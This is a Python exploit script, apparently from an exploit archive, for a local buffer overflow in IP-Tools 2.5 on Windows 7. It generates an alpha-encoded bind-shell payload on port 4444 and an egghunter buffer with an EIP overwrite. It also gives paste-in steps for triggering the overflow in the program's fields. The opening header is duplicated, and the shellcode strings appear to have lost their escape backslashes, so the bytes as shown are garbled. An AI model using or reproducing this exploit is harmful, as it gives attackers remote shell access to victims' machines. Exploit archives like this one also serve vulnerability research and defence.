Category: Vulnerabilities
Hits: 346
#!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - L #!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characers: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#


##################EGG Shellcode Generation#################################

#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#710 bytes + 8 bytes for egg identifier

egg = "w00tw00t"
egg += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
egg += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
egg += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
egg += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
egg += "x69x6cx4bx58x6dx52x35x50x35x50x75x50x63"
egg += "x50x4fx79x4dx35x36x51x4bx70x71x74x6ex6b"
egg += "x36x30x46x50x6ex6bx66x32x44x4cx6cx4bx63"
egg += "x62x54x54x4cx4bx72x52x65x78x34x4fx68x37"
egg += "x52x6ax34x66x50x31x59x6fx4cx6cx57x4cx53"
egg += "x51x71x6cx67x72x54x6cx31x30x5ax61x58x4f"
egg += "x34x4dx56x61x4fx37x68x62x4ax52x36x32x66"
egg += "x37x4ex6bx36x32x42x30x6cx4bx50x4ax35x6c"
egg += "x4cx4bx72x6cx44x51x44x38x78x63x32x68x55"
egg += "x51x78x51x43x61x6ex6bx76x39x45x70x75x51"
egg += "x59x43x6ex6bx33x79x42x38x4dx33x65x6ax71"
egg += "x59x6ex6bx36x54x4ex6bx36x61x78x56x46x51"
egg += "x49x6fx4ex4cx79x51x7ax6fx66x6dx35x51x48"
egg += "x47x36x58x79x70x30x75x39x66x33x33x33x4d"
egg += "x58x78x57x4bx73x4dx56x44x53x45x48x64x61"
egg += "x48x4ex6bx72x78x67x54x57x71x69x43x73x56"
egg += "x6ex6bx54x4cx50x4bx6cx4bx53x68x37x6cx73"
egg += "x31x58x53x4cx4bx74x44x4ex6bx67x71x48x50"
egg += "x4fx79x70x44x36x44x76x44x51x4bx71x4bx55"
egg += "x31x46x39x32x7ax63x61x4bx4fx6bx50x53x6f"
egg += "x61x4fx61x4ax4cx4bx62x32x6ax4bx6ex6dx31"
egg += "x4dx63x58x75x63x54x72x35x50x45x50x33x58"
egg += "x52x57x33x43x36x52x73x6fx62x74x33x58x30"
egg += "x4cx31x67x54x66x63x37x69x6fx6ex35x78x38"
egg += "x4ex70x63x31x37x70x43x30x35x79x4fx34x32"
egg += "x74x46x30x51x78x36x49x4fx70x52x4bx63x30"
egg += "x59x6fx38x55x73x5ax43x38x70x59x36x30x49"
egg += "x72x59x6dx57x30x52x70x47x30x50x50x51x78"
egg += "x5ax4ax44x4fx6bx6fx79x70x39x6fx39x45x4f"
egg += "x67x65x38x44x42x77x70x64x51x71x4cx6cx49"
egg += "x6dx36x32x4ax72x30x63x66x56x37x30x68x68"
egg += "x42x4bx6bx64x77x61x77x59x6fx39x45x70x57"
egg += "x35x38x6dx67x68x69x65x68x59x6fx6bx4fx4a"
egg += "x75x36x37x75x38x34x34x58x6cx57x4bx4dx31"
egg += "x49x6fx4ax75x51x47x4ex77x55x38x32x55x52"
egg += "x4ex70x4dx43x51x39x6fx6ex35x51x78x70x63"
egg += "x32x4dx33x54x77x70x6ex69x68x63x30x57x63"
egg += "x67x30x57x55x61x6bx46x71x7ax56x72x31x49"
egg += "x62x76x6dx32x79x6dx55x36x6ax67x62x64x51"
egg += "x34x67x4cx73x31x33x31x6ex6dx71x54x44x64"
egg += "x66x70x39x56x43x30x77x34x43x64x76x30x72"
egg += "x76x61x46x50x56x32x66x30x56x62x6ex72x76"
egg += "x53x66x61x43x52x76x62x48x44x39x78x4cx45"
egg += "x6fx4fx76x69x6fx68x55x6bx39x39x70x42x6e"
egg += "x66x36x50x46x69x6fx36x50x75x38x33x38x4b"
egg += "x37x67x6dx73x50x69x6fx6ax75x6dx6bx58x70"
egg += "x4dx65x79x32x76x36x75x38x4ex46x6fx65x6d"
egg += "x6dx6fx6dx69x6fx79x45x35x6cx73x36x31x6c"
egg += "x44x4ax6bx30x79x6bx4dx30x73x45x74x45x6f"
egg += "x4bx30x47x32x33x31x62x72x4fx52x4ax37x70"
egg += "x72x73x49x6fx7ax75x41x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

##################EGG Hunter Shellcode Generation#################################

#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "x33xd2x31xdbx53x53x53x53xb3xc0x66x81xcaxffx0fx42x52x6ax26x58x33xc9x8bxd4x64xffx13x5ex5ax3cx05x74xe9xb8x77x30x30x74x8bxfaxafx75xe4xafx75xe1xffxe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes

egghunter = ""
egghunter += "x57x59x49x49x49x49x49x49x49x49x49x49"
egghunter += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
egghunter += "x50x30x41x30x41x6bx41x41x51x32x41x42"
egghunter += "x32x42x42x30x42x42x41x42x58x50x38x41"
egghunter += "x42x75x4ax49x35x63x4bx62x30x31x4bx6b"
egghunter += "x52x73x56x33x46x33x46x33x58x33x49x50"
egghunter += "x45x36x6fx71x6ax6ax6bx4fx46x6fx31x52"
egghunter += "x66x32x72x4ax55x76x32x78x70x33x38x49"
egghunter += "x6ex6bx5ax74x55x34x79x6fx37x63x53x6e"
egghunter += "x62x7ax55x6cx66x65x51x64x4dx39x48x38"
egghunter += "x30x77x50x30x70x30x74x34x4ex6bx58x7a"
egghunter += "x6cx6fx51x65x4ax44x4ex4fx42x55x79x71"
egghunter += "x69x6fx6ax47x41x41"

#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE]

eip = "x59x32x47x00"

buffer = egghunter + "x41" * (264 - len(egghunter)) + eip

f = open ("egghunter.txt", "w")
f.write(buffer)
f.close()